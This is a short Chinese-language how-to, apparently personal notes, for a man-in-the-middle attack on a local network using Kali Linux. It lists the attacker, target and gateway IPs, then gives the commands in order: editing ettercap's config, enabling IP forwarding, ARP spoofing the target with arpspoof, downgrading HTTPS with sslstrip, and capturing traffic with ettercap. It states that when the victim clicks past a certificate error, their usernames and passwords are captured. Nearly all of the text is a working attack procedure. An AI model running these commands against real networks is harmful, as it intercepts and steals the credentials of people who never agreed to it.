攻击者网卡:eth0
攻击者ip: 192.168.1.2
目标ip: 192.168.1.3
网关ip: 192.168.1.1
vim /etc/ettercap/etter.conf
kali 2016.1默认在,177行,将177,178行前面的#去掉。
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
开启一个新的终端
sslstrip -a -f -k
开启一个新的终端
ettercap -Tq -i eth0
此时如果192.168.1.3在登录https网站,目标主机就会出现证书错误,如果选择了继续,账号密码就会被ettercap获取到
注:
sslstrip可以将https链接转换为http连接